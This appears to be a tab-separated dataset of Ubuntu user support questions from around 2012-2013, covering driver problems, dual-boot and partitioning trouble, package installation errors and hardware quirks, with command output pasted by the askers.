262972	how to install lib1394 i386 ( 32bit ) version on ubuntu 11.10 amd64	i have an old acquisition program for a firewire that seems to need the 32bits version of the library libraw1394.so . some notes , about the problem : i think that the output of uname -m indicates that i have an ubuntu 64bits installed : $ uname -m x86_64 if i execute ldd on my application , the output indicates that lib1394.so was not found : $ ldd ./smallv linux-gate.so.1 = > ( 0xf76e9000 ) libsvs.so = > /usr/local/svs/bin/libsvs.so ( 0xf76c7000 ) libsvscalc.so = > /usr/local/svs/bin/libsvscalc.so ( 0xf76b7000 ) libsvscap.so = > /usr/local/svs/bin/libsvscap.so ( 0xf76a0000 ) libfltk.so.1.1 = > /usr/local/svs/bin/libfltk.so.1.1 ( 0xf761a000 ) libfltk_gl.so.1.1 = > /usr/local/svs/bin/libfltk_gl.so.1.1 ( 0xf7612000 ) libglu.so.1 = > /usr/lib32/libglu.so.1 ( 0xf7573000 ) libgl.so.1 = > /usr/lib32/nvidia-current/libgl.so.1 ( 0xf74a1000 ) libstdc++.so.6 = > /usr/lib32/libstdc++.so.6 ( 0xf73b5000 ) libpthread.so.0 = > /lib32/libpthread.so.0 ( 0xf739a000 ) libm.so.6 = > /lib32/libm.so.6 ( 0xf7370000 ) libc.so.6 = > /lib32/libc.so.6 ( 0xf71f1000 ) libgcc_s.so.1 = > /usr/lib32/libgcc_s.so.1 ( 0xf71d3000 ) libdcap.so = > /usr/local/svs/bin/libdcap.so ( 0xf71c5000 ) libraw1394.so.8 = > not found libxext.so.6 = > /usr/lib32/libxext.so.6 ( 0xf71b2000 ) libx11.so.6 = > /usr/lib32/libx11.so.6 ( 0xf707c000 ) libnvidia-tls.so.280.13 = > /usr/lib32/nvidia-current/tls/libnvidia-tls.so.280.13 ( 0xf7079000 ) libnvidia-glcore.so.280.13 = > /usr/lib32/nvidia-current/libnvidia-glcore.so.280.13 ( 0xf5767000 ) librt.so.1 = > /lib32/librt.so.1 ( 0xf575e000 ) libdl.so.2 = > /lib32/libdl.so.2 ( 0xf5759000 ) /lib/ld-linux.so.2 ( 0xf76ea000 ) libraw1394.so.8 = > not found libxcb.so.1 = > /usr/lib32/libxcb.so.1 ( 0xf573a000 ) libxau.so.6 = > /usr/lib32/libxau.so.6 ( 0xf5735000 ) libxdmcp.so.6 = > /usr/lib32/libxdmcp.so.6 ( 0xf572e000 ) when i run the application i get the following error : $ ./smallv ./smallv : error while loading shared libraries : libraw1394.so.8 : wrong elf class : elfclass64 the library is locted in /usr/lib/ but it is and elf63 version : $ readelf -h /usr/lib/libraw1394.so elf header : magic : 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 class : elf64 data : 2 's complement , little endian version : 1 ( current ) os/abi : unix - system v abi version : 0 type : dyn ( shared object file ) machine : advanced micro devices x86-64 version : 0x1 entry point address : 0x4460 start of program headers : 64 ( bytes into file ) start of section headers : 58768 ( bytes into file ) flags : 0x0 size of this header : 64 ( bytes ) size of program headers : 56 ( bytes ) number of program headers : 7 size of section headers : 64 ( bytes ) number of section headers : 26 section header string table index : 25 i have been searching a solution in various posts . so , i think that i have the source code of the applications so that i should be able to compile it . so i have to solutions , but i do not know how to execute them : solution 1 ) install the i386 ( 32bits ) version of the library solution 2 ) compile the application again i have been reading posts and it seems that i should use either getlibs either ia32-libs either multiarch . please , any feedback to the problem will be helpful ! thanks a lot ! jespestana
262981	how to install mod_authz_host in apache ?	when i put order deny , allow deny from all allow from dev.example.com into /etc/apache2/conf.d/restrict.conf , upon service apache2 restart i get syntax error on line 1 of /etc/apache2/conf.d/restrict.conf : order not allowed here action 'configtest ' failed . the apache error log may have more information . ... fail ! please help . many thanks in advance !
262984	how i install adobe audition cs6 to ubuntu 12.10	how do i install adobe audition on ubuntu ?
262985	why does the wifi disconnects when i plug my laptop ?	if i connect my laptop to the power the wifi stops for every other devices on the same network but still works on my laptop ... i tried couple things like power management using iwconfig and some grub options like those : grub_cmdline_linux= '' acpi_osi=linux pcie_aspm=off i really do n't know where to look to solve this problem . i thought it was an ip address conflict at first but it 's really only when i connect the laptop to the power that other devices ca n't use internet anymore . thanks for the help . edit : forgot useful infos : lspci | grep wireless 03:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) i 'm using proprietary drivers .
262986	temperature soars when glxspheres is off-screen	my laptop samsung rf511 is overheating . i noticed this problem while playing minecraft : my computer would suddenly shut down . i checked /var/log/kern.log and sure enough the system reported temperature was over 90 degrees at the time of shutdown . in order to diagnose the problem i installed psensor . i am using bumblebee . so i thought to try the approach mentioned in this question and ran optirun glxspheres . no problem ! temperature was a steady 60 across the board . so , with glxgears still running i switched workspaces to my browser in order to pursue another avenue . at that moment psensor reported temperatures up to 90 degrees ! when i switched back to the desktop running glxgears , everything went back to normal . this fits the previous crashes , since when i play minecraft i spend a lot of time afk in a different desktop . i 'm using ubuntu 11.10 , kernel 3.0.0-31-generic . z .
262988	why do i need the ssh server package to rlogin into my machine ?	when i try to login into a ubuntu machine using rlogin it mentions ssh connection refused . in order to resolve this i installed the openssh-server package on the remote machine . why is this not part of the ubuntu distribution ? do i really need this service ?
262996	how do you install ubuntu on a pre-installed windows7 system	how do you install ubuntu on a pre-installed windows7 system which usually comes with the max of 4 primary partitions already used up by the windows 7 installation . as these systems do not come with a windows system disk you can not simply re-install windows if you mess up . so getting it right first time is critically important . i have seen some great instructions on www.avoiderrors.net but none deal with this specific but very common situation encountered by new users .
262998	deleted the ubuntu file in windows , but i am still prompted to choose between ubuntu and windows on boot	i installed ubuntu using wubi . i got version 12.10 32-bit . after all was done i noticed a file on my c : drive labeled ubuntu so i figured when i wanted to uninstall this would be the file to delete . but i have deleted this file and i still get the menu when i start up my pc that asks me to pick an os . so how can i remove ubuntu from this and just have my pc boot directly into windows ?
262999	can i install ubuntu to a partition on my portable hard drive ?	ok i 've got a live usb which i can load the ubuntu 12.10 installer from so that 's no problem . i am very cautious about losing files and i do n't have much space on my computer anyway so i am going to install ubuntu to my 300 gig portable hard drive . here 's the deal : my computer has 2 internal drives : c : 500 gigabytes d : 1000 gigabytes and then my 300 gig portable hard drive has 2 partitions : m : my stuff - 211 gigabytes ntfs p : ubuntu ( currently blank ) - 86 gigabytes ntfs ( i tried formatting it as ext4 but windows could n't detect it anymore so i changed it back . i know it needs to be ext4 for ubuntu to boot though ) now i want to boot my computer from the usb and install ubuntu to the portable hard drive on the 86 gigabyte partition without touching my main 2 hard drives or the 200 gig partition on my portable have drive . is it possible to install ubuntu 12.10 to this ubuntu partition and get it to boot correctly ? if so please tell me step by step how to achieve this installation without corrupting my computers boot loader . thanks in advance ; )
263000	where can i find a driver for the amd ati hd 7290 video card on my aspire one725 ?	i 'm pretty bad with linux , but i 've been using it for five years now , because there 's some incredible free software and open source is good and all that stuff , and if i ever ran into a problem i could find a solution on these forums and mend it myself and learn a little along the way . however ... my problem : i 've been trying a lot of fixes to get my graphics card working on the new netbook i bought . sadly , i 've been trying for the past few days and i 'm pretty stumped . it would be particularly nice to get this working since my screen brightness ca n't be changed , and obviously having a netbook that drains battery does n't make it worthwhile . if i install the proprietary drivers recommended it will prevent booting . maybe there 's no drivers for ubuntu yet , and i should wait patiently . here are some people having the same problem : http : //ubuntuforums.org/showthread.php ? t=2101078 my system : model : aspire one , ao725-0826 os : ubuntu 12.04 64-bit processor : amd c-70 apu with radeon ( tm ) hd graphics ă 2 video card : wrestler [ radeon hd 7290 ]
263003	download video from youtube	how can i download the video from this youtube link . due to some reasons , video download helper , the firefox addon , is not working . any other ways in ubuntu ? youtube link edit my question was not clear . i have seen the other link on how download youtube using ubuntu . however i am poiting to this specific link in youtube , for which some of the download helpers ( tried youtube-dl , downloadhelper , ss.net ) , are not working .
263008	how can gparted be used to fix `` partition does not start on physical sector boundary problem '' ?	updated i tried to learn gparted and use it with all the risks -_- and i think that i found a solution , but i still have problem , please read my question below this is from terminal after i move the sda7 sudo fdisk -l disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00075eb1 device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 212723711 106258432 7 hpfs/ntfs/exfat /dev/sda3 212725758 1953523711 870398977 5 extended partition 3 does not start on physical sector boundary . /dev/sda5 212725760 410556415 98915328 83 linux /dev/sda6 1937899520 1953523711 7812096 82 linux swap / solaris /dev/sda7 410560512 508213247 48826368 83 linux /dev/sda8 508216338 1937888819 714836241 7 hpfs/ntfs/exfat partition 8 does not start on physical sector boundary . partition table entries are not in disk order this output is from the terminal before i used gparted disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00075eb1 device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 212723711 106258432 7 hpfs/ntfs/exfat /dev/sda3 212725758 1953523711 870398977 5 extended partition 3 does not start on physical sector boundary . /dev/sda5 212725760 410556415 98915328 83 linux /dev/sda6 1937899520 1953523711 7812096 82 linux swap / solaris /dev/sda7 410557203 508216274 48829536 83 linux partition 7 does not start on physical sector boundary . /dev/sda8 508216338 1937888819 714836241 7 hpfs/ntfs/exfat partition 8 does not start on physical sector boundary . partition table entries are not in disk order it seems /dev/sda7 fixed ( i only tried with 1 partition first since its trial and error lol ) but there 's problem with gparted as follows : screen shoot from gparted is this normal ? one more question , i know this sounds stupid , but when i tried to resize /dev/sda3 , i cant click the label `` resize/move '' .
263011	wireless networks : device not ready ( firmware missing )	i 'm on ubuntu 12.04.1 lts and i recently changed my update server because i was having issues with update manager . then when i rebooted my wireless was n't working , but my wired connection was . i 'm on a sony vaoi vgn-sr41m with an intel corporation wifi link 5100 . thanks !
263015	high interrupts	i have high rescheduling interrupts and local interrupts . while doing nothing my total cpu wakeups reach 275-400 . while watching movies it reaches up 900-1000 . and while browsing the internet it reaches above 2000 . is it normal for ubuntu ? due to this i am experiencing overheating problem . i have tried using parameters noapic , pci=routeirq , pci=noacpi and acpi=off in grub but it didnt work . what can i do to solve this problem ?
263017	headset not muting speakers	plugging in the headphones does not mute the laptops speakers , music does play out of the headphones but also continues to play out of the speakers as well . alsamixer 's 'auto-mute mode ' is already enabled . when i look at the sound settings in , 'output devices ' it only has 1 item in the list 'speakers built-in audio ' . yet when looking at 'pulseaudio volume control ' under 'output devices ' the 'port ' drop-down list has 2 options 'speakers ' & 'headphones ' . selecting 'headphones ' from that list does mute the speakers . specs : ubuntu 12.10 asus k55a.404 aplay -l output : **** list of playback hardware devices **** card 0 : pch [ hda intel pch ] , device 0 : alc270 analog [ alc270 analog ] subdevices : 0/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0
263019	dkms error when installing amd drivers	i need to install amd drivers in my ubuntu 12.10 . i followed what is the correct way to install ati catalyst video drivers ( fglrx ) ? ( and i installed all dependencies from 12.04 guide ) here is my logs : check if system has the tools required for installation . uninstalling any previously installed drivers . creating symlink /var/lib/dkms/fglrx/8.98/source - > /usr/src/fglrx-8.98 dkms : add completed . kernel preparation unnecessary for this kernel . skipping ... building module : cleaning build area ... . cd /var/lib/dkms/fglrx/8.98/build ; sh make.sh -- nohints -- uname_r=3.5.0-17-generic -- norootcheck ... .. ( bad exit status : 1 ) [ error ] kernel module : failed to build fglrx-8.98 with dkms [ error ] kernel module : removing fglrx-8.98 from dkms -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- deleting module version : 8.98 completely from the dkms tree . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- done . [ reboot ] kernel module : update-initramfs any ideas what im missing ?
263020	tap-to-click not working in ubuntu 12.04	i edited xorg.conf as suggested here to control the speed of pointer movement for apple magic trackpad in 12.04.1 and it works . but now the trackpad does not recognize tap-to-click . i read the man page for synaptics but since i am a noob could make much out of it . appreciate community help .
263021	what is the maximum allowed files open ?	is 1048577 the limit of open files in ubuntu ? if i try the following code it works . however , if i change the value to 1048578 the setrlimit function will return the code 1 and errno will be set to 1 as well . int l ; struct rlimit rl ; rl.rlim_cur = 1048577 ; rl.rlim_max = 1048577 ; l = setrlimit ( rlimit_nofile , & rl ) ; if ( l ! = 0 ) { errx ( 1 , `` setrlimit returned result % d '' , errno ) ; } i am running it as root and compiling with gcc 4.6.3
263025	desktop disappeared using geforce 470 gtx	i tried so many time to setup different driver on ubuntu 12.10 , but all of them are useless . my desktop disappear everytime and my loadingscreen , if i reboot , looks bad . lspci | grep vga 03:00.0 vga compatible controller : nvidia corporation gf100 [ geforce gtx 470 ] ( rev a3 ) dpkg -l | grep -i nvidia ii bbswitch-dkms 0.5-1~quantalppa1 all interface for toggling the power on nvidia optimus video cards the name of my driver now is ... gallium 0.4 on llvmpipe ( llvm 3.2 , 128 bits ) i tried this ... sudo apt-get remove -- purge nvidia-* sudo apt-get install linux-headers-generic sudo apt-get nvidia-current nvidia-settings
263028	how can i remove ubuntu from the uefi boot options ?	i have a gigabyte motherboard . ga-z77x-ud3h to be specific . i recently installed ubuntu and deleted it again , but it still shows up on the uefi boot option even if i removed all hard drives connected to the motherboard . so no hard drives , even cd/dvds , usb drives connected and i still see the ubuntu boot option . any ideas/suggestions ?
263037	ubuntu installation partitioning gone wrong	i wanted to install ubuntu 12.4 lts beside my windows 7 . so i put the cd and booted my pc , everything was easy , but i wanted to give ubuntu 200gb and instead i gave it more than a terabyte . now , my windows 7 has just 288gb free space . also linux-swap has 12gib which i think is too much . it should be 3gb . is that correct ? here is an image of gparted and the partitions : now , i wanted to ask what is the best way to fix all this . how can i be sure what sda1 , sda2 , sda3 , sda4 , sda5 , sda6 is ? i do n't want to destroy my windows 7 . should i just delete ubuntu 12.4 lts and give the partitions back to windows ? how can i do that ? how should i uninstall ubuntu and how can i give the partition back to windows 7 ? or , should i use the gparted and shrink the partitions of ubuntu and give the rest to windows 7 ? how should i do that step by step ? is it better then the first option ? also , why are there three partitions sda4 , 5 & 6 ? should there not be one ? when installing again , ubuntu 12.4 lts how can i just give it 200gb main partition and swap partition of 4gb ? the first time i tried i could n't figure out what to do in advance partitioning . so i let ubuntu cd do it for me . any help appreciated . how do i merge the unallocated partition with my windows partition ? ok now i get this : but how can i add the unallocated partition to my windows back ( sda2 i guess ) . when i click on sda2 resize i ca n't move it on the unallocated partition . i want now to merge it to my windows partition . so what should i do now ? should i do this from windows , but how ?
263039	problem regarding adobe flash plugins	my adobe flash plugin has stopped working on ubuntu12.04 . no videos i can see . when try to install it again . following things come on terminal ... root @ ubuntu : /home/salty # sudo apt-get install adobe-flashplugin reading package lists ... done building dependency tree reading state information ... done package adobe-flashplugin is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'adobe-flashplugin ' has no installation candidate root @ ubuntu : /home/salty # now what to do.. any idea ? ? ?
263042	ca n't install/boot ubuntu	i am getting the error : ata [ 462 ] : hdio_get_identity failed for '/dev/sdh ' : invalid argument i used the x64 ubuntu 12.10 download burned to a dvd . i can not boot from the dvd . i am using : sabertooth z77 intel raid volume ( 256gb ) - 2x intel ssd i7 3770 16gb ddr3 what are my options ? perhaps a different kernel ? better driver support ?
263044	after install ubuntu 12.10 can not boot to windows 8 ( pre-installed )	recently i have bought a lenovo z580 with pre installed windows 8 and i have installed ubuntu 12.10 ( secure boot was enabled when i was installing ubuntu after the installation i disabled it ) i can boot to ubuntu with out a problem but i can not boot to windows 8 from any where ( grub menu or directly from the driver ) . the message from grub2 when i am trying to boot to windows 8 or windows 8 recovery is the same : can not find command 'drivemap ' ; invalid efi file path if i try to boot directly to the hard disk then a blue screen popup with the message : the boot configuration data for your pc is missing or contains errors file \efi\microsoft\bcd error code 0xc000014c you will need to use the recovery disk tools on your installation media . i did not make a recovery disk : ( so i can not fix it by this way . i try to boot to a windows 8 installation disk from msdna to call the recovery console but there i gives me the following message other error the boot configuration data for your pc is missing or contains errors error code 0xc000000d i have try to use boot-repair but it does not solve my problem . here is the boot info before running the boot-repair http : //paste.ubuntu.com/5576237/ here is the boot info after running the boot-repair http : //paste.ubuntu.com/5576272/ also i have try solve this by this way here dual boot windows 8 ubuntu 12.10 uefi but with no chance .
263045	how to add full desktop & configs to a minimal install ?	all - brand new to anything non-windows , allured by zfs and ubuntu to set up a large storage pool at home on a functional desktop . i have an amd64 ubuntu 12.04.2 debootstrap minimal install on a zfs root , which gives me a command prompt os that is n't very familiar with my system hardware , and i do n't know where to go from here . i assume the desktop installation cd is a no-go , since it 's not likely to understand the zfs filesystem well . what 's my road map for putting on the full gui ( with multiple users , cups , samba file shares with windows & mac things , media serving , etc . ) and getting all the devices working and settings configured ? is it as simple as `` apt-get install ubuntu-desktop '' ? will that get things all plugged in & working ? or will i have to manually configure things before/during/after the installation ? or will the alternate cd be able to work with a pre-existing os and continue a semi-automatic installation ? or should i try to get all unixy and get the minimal system more configured , adding the desktop afterwards ? thanks much !
263049	building rhythmbox from source	i 'm trying to build rhythmbox from source to have a go at adding an extra feature . i 'm running into issues with gstreamer configure : error : package requirements ( gstreamer-1.0 > = 0.11.92 gstreamer-audio-1.0 > = 0.11.92 gstreamer-base-1.0 > = 0.11.92 gstreamer-plugins-base-1.0 > = 0.11.92 gstreamer-pbutils-1.0 > = 0.11.92 ) were not met : no package 'gstreamer-audio-1.0 ' found no package 'gstreamer-plugins-base-1.0 ' found no package 'gstreamer-pbutils-1.0 ' found i 've tried what 's in this post , sudo apt-get build-dep rhythmbox and installing some of the gstreamer packages to no avail .
263050	how do i flash dailies without data loss ?	is there a way to get the daily upgrades withou losing personal data i.e . my contacts and photos each times ? fyi i am doing it like this : phablet-flash -l
263051	how can i switch from using rails 2 ( packaged ) to rails 3 ( rvm ) ?	i 've installed the rails 2.3.14 package by running : sudo apt-get install rails it is working fine . but after that i installed the rails 3.2.9 gem by running : gem install rails in the terminal , rails -v gives me rails 2.3.14 . if i run these two commands , . ~/.bash_profile rails -v then i get rails 3.2.9 . i do n't know what exactly is happening . now i want just the rails 3.2.9 gem . what should i do to get that ?
263055	url to open compose mail in new window with unity mail	i use the `` unity mail '' app , and it does what i need . it 's a really nice app . but there 's a thing i ca n't figure out . i have made a custom url in `` compose '' in the preferences , so that instead of opening gmail with a new compose mail in the corner , i get an new clean tap with only the new compose mail . https : //mail.google.com/mail/ ? ui=2 & view=cm & fs=1 & tf=1 & shva=1 the question are , what piece of code do i need to ad , to make it open in a new separate window instead of a new tap ? -and possible in a predefined size ? i use chromium , but firefox behaves the same .
263056	virtual box graphic issues when launched in another x session ?	when i start virtual box in another x session under tty8 , i get some strange results . everything appears to be normal but when i boot up my windows 7 home premium 64 bit system aero does not work . however if i load this same virtual machine in the regular session that is started when logging in nothing is wrong and aero works fine . the command i use is `` xinit virtualbox -- :1 '' anyone have any idea what is going on ? thank you in advance .
263066	ca n't login to ubuntu 12.04 since i reinstalled battery related packages	i reinstalled gnome-power-manager , upower and indicator-power in order to fix battery indicator issues . now when i try to login , the screen turns black and sends me back to the login screen . following does n't work for me : already tried to login with gdm . removing ~/.xauthority did n't work either . i am running ubuntu 12.04 lts 64-bit , and do n't know what else i can try .
263068	error on upgrade to 12.10	having this error message when i upgrade : failed to fetch cdrom : [ ubuntu 12.10 _quantal quetzal_ - release amd64 ( 20121017.5 ) ] /pool/main/d/dkms/dkms_2.2.0.3-1.1ubuntu1_all.deb file not found failed to fetch cdrom : [ ubuntu 12.10 _quantal quetzal_ - release amd64 ( 20121017.5 ) ] /pool/main/f/fakeroot/fakeroot_1.18.4-2_amd64.deb file not found how to resolve this ?
263072	spf records problem	i 'm using ubuntu 10.04.1 lts in my vps and i 'm trying to set up spf records i have used perl and python methods but no one works for me when i send email test to spf checker it says result : none ( no applicable sender policy available )
263076	pdf reader with all search results for ubuntu	in windows ' acrobat reader , i can do an advanced search for some phrase , and a left pane displays all search results , which i can click on . is there any similar program for ubuntu ? i 'm using ubuntu 12 , and could n't install acroread . the other applications ( okular , evince ) have a find/search command but no feature to display all results . i could do a pdftotext and grep on a console , but this is not as nice as being able to click on results like the windows app has . is there an ubuntu app that has this feature ?
263084	install drivers for dell inspiron 7420	i just installed ubuntu on my laptop dell inspiron 14r 7420 . how do i install the softwares which are required the shortcut functions , such as turning on light the keyboard fn + f6 or disable the mouse pad fn + f3 ) ? thank you very much for your help !
263086	logitech trackman marble can not middle-click	i have a logitech trackman marble ( also known as a marblemouse ) , which lacks a middle button . previously , i have emulated a middle-click by clicking with both left and right buttons . this works great under kde plasma . however , i am sick unto death of plasma , and recently switched back to openbox . now , my emulated middle click no longer works . i have set emulate3buttons true in both /etc/x11/xorg.conf and in /usr/share/x11/xorg.conf.d/50-marblemouse.conf . i know that the latter file is still being read , because i needed a hack in it to scroll , and that still works . i am running xorg 7.7 under ubuntu 12.10 with openbox 3.5.0 .
263090	xrandr not found with nvidia driver	i am running two monitors in xinerama , left and right . i can not convince the nvidia drivers to rotate the right screen , and xrandr will not run , stating `` randr extension missing '' . i am running xorg 7.7 under ubuntu 12.10 , with the nvidia proprietary drivers , version 304.43 . ( though the version numbers do n't seem to matter , because i get this problem with every version of all of the above . ) here is my xorg.conf : section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 screen 1 `` screen1 '' rightof `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` true '' endsection section `` files '' endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` yes '' option `` zaxismapping '' `` 8 9 '' endsection section `` inputdevice '' identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` monitor '' identifier `` monitor1 '' horizsync 31.5 - 81.0 vertrefresh 56.0 - 75.0 option `` dpms '' option `` rotate '' `` left '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' busid `` pci:1:0:0 '' option `` randrrotation '' `` true '' endsection section `` device '' identifier `` device1 '' driver `` intel '' busid `` pci:0:2:0 '' option `` randrrotation '' `` true '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' option `` rotate '' `` left '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection
263091	major differences between versions ?	i 'm having problems with 12.10 and 13.04 regarding steam ( specifically team fortress 2 game ) which at some random point i will experience a fps drop , something like from 200 to 10 . i 'm not sure but this could be a memory leak because the whole system gets slow afterwards , only a reboot to fix ( sometimes a lightdm restart ) . i even created a thread on steam linux discussions reporting how to fix it on 12.04.1 by manually upgrading the kernel to 3.5.0-25 ( link here ) , but somehow if the kernel comes with the system ( like on 12.04.2/12.10/13.04 ) the problem still persists . i love 13.04 and 12.10 , but i ca n't see any major differences in performance or anything else , just in their repositories ( 12.04 has `` older '' versions of the majority of programs out there ) . so , what makes 12.10/13.04 better than 12.04 ?
263092	compiling php 5.2 from source under 12.04 , apxs2 ( via libtools ) ignores the -prefix used with ./configure	in the source directory : ./configure -- prefix=/home/ashkan/development/php/bin/php-5.2 -- with-mysql -- with-apxs2=/usr/bin/apxs2 make works fine but make install says : installing php sapi module : apache2handler /usr/share/apache2/build/instdso.sh sh_libtool='/usr/share/apr-1.0/build/libtool ' libphp5.la /usr/lib/apache2/modules /usr/share/apr-1.0/build/libtool -- mode=install cp libphp5.la /usr/lib/apache2/modules/ libtool : install : cp .libs/libphp5.so /usr/lib/apache2/modules/libphp5.so cp : can not create regular file `/usr/lib/apache2/modules/libphp5.so ' : permission denied apxs : error : command failed with rc=65536 update : reading man apxs2 it seems apxs compiles and then installs the module into apache module directory . this module directory seems to be fixed !
263095	ubuntu desktop with gui and ssh access	i used to have ubuntu server 12.10 , and i used to connect to it with my windows pc using ssh . all i had to do was turn my server computer on and next thing i could do was run my putty and connect to it . lately i 've been needing gui , so i went and installed gui to server , but got everything messed up so i did fresh install of ubuntu desktop 12.10 . now i want to be able to use this new configuration similar way to my old one . i want to turn my server pc ( only tower ) on and then immediately be able log in to it , either by using putty or connection to remote desktop . but i have run into few problems . problem is that i cant connect to it before i have signed in locally on server pc . is there any work around for this ?
263098	is there speech recognition in ubuntu for phones ?	is ubuntu touch is able to recognize voice commands ? what kind of speech recognition is built in and is it usable in ubuntu desktops ?
263099	how to install ubuntu server in dual boot pc with ubuntu and xp ?	i have a dell dimension 4600 desktop that i no longer use and i decided to turn it into a server . it is running windows xp . now , i had a flash drive that has ubuntu 11.0 on it where i used it to install ubuntu on another computer . anyway , i downloaded ubuntu server onto the flash drive and used the flash drive to install ubuntu on the desktop -- -- when i realized that it was not ubuntu server but ubuntu 11.0 i could not stop the install in fear of doing damage . so , now i have windows xp and ubuntu 12.04 ( i did the upgrade ) on this desktop . i want to install ubuntu server . how do i go about doing that ? i am new to computers and ubuntu . so please give me detailed explanation .
263101	how to download and install java plugin for firefox 19.0	i was in a site ( url : http : //www.francocube.com/cyril/step_1.php ) and there was animations tht needed a plugin . when i clicked on an animation , firefox 19.0 showed : `` additional plugins are required to display all the media on this page '' , so i clicked on `` install missing plugins '' and a window `` plugin finder service '' appeared and said that firefox 19.0 was now checking for available plugins ... it froze for 10 or 15 minutes , so i assumed that it would not work . then , i found a link in the same page who says `` java is not activated in your computer . you have to install java '' . i clicked the link but i did n't understand what to do exactly because i am new with linux . what can i do ?
263110	gnu fortran 95 compiler gui ?	i am new to ubuntu & linux . i installed gnu fortran 95 compiler.i use ubuntu 12.04 lts i want to run a code in fortran 90 . where do i go to run the code ? is there a gui for that ? i cant find anything related to the applications bar .
263112	software update fails	failed to fetch cdrom : //ubuntu 12.10 _quantal quetzal_ - release amd64 ( 20121017.5 ) /dists/quantal/main/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 12.10 _quantal quetzal_ - release amd64 ( 20121017.5 ) /dists/quantal/restricted/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 12.10 _quantal quetzal_ - release amd64 ( 20121017.5 ) /dists/quantal/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 12.10 _quantal quetzal_ - release amd64 ( 20121017.5 ) /dists/quantal/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms e : some index files failed to download . they have been ignored , or old ones used instead . this is what iâm getting at the end when i try to update software
263115	bootloader question with the default âinstall ubuntu along windowsâ option	after using virtual machines and wubi for the last few years i finally took the time to install ubuntu in a dual boot . i read a ton of tutorials , but they all recommended different things . so i figured that the option `` install ubuntu along windows '' would be a pretty safe and solid choice else it should n't be offered . i already had a second partition for my data , so there was no need for that . now after a succesfull installation ( not really sure about , hence my question ) , i get the grub bootloader on startup and i have an option to also boot windows . is this the preferred setup ? i read a lot that grub should be installed on a different partition and that windows should take care of booting . is this true ? will windows updates break my installation ? after some searching i found that i could use easybcd as seen on http : //neosmart.net/wiki/display/ebcd/ubuntu to use the windows boot loader . wo n't it overwrite the grub in mbr ? thank you in advance
263116	i broke hibernate when i set two distros to use the same swap space	i use ubuntu as my primary os , but i have also installed fedora to see what all the hype is about . i made the stupid decision of making them share swap space , not thinking of the consequences on hibernation ( my laptop supported hibernation before this ) . i have removed that swap space from fedora 's fstab , and even tried deleting and remaking the swap space ( yes , i did change the uuid in ubuntu 's fstab ) . is there any way i can fix this without doing a clean install ?
263117	installation of ns-allinone2.34 in ubuntu 10.04	i need to install ns-allinone 2.34 in order to implement leach protocol . i followed all the steps of installation when i write ./install in the terminal i got this result : warning : tclstubinit.c may be out of date . developers may want to run `` make genstubs '' to regenerate . this warning can be safely ignored , do not report as a bug ! installing libtcl8.4.a to /home/rain/ns-allinone-2.34/lib/ cp : can not create regular file '/home/rain/ns-allinone-2.34/lib/ # inst.6373 # ' : permission denied rm : can not remove '/home/rain/ns-allinone-2.34/lib/libtcl8.4.a ' : permission denied mv : can not stat '/home/rain/ns-allinone-2.34/lib/ # inst.6373 # ' : no such file or directory ranlib : could not create temporary file whilst writing archive : no more archived files make : *** [ install-binaries ] error 1 tcl8.4.18 installation failed . tcl is not part of the ns project . please see www.scriptics.com to see if they have a fix for your platform . even when i enter `` ns '' the result : command not found .
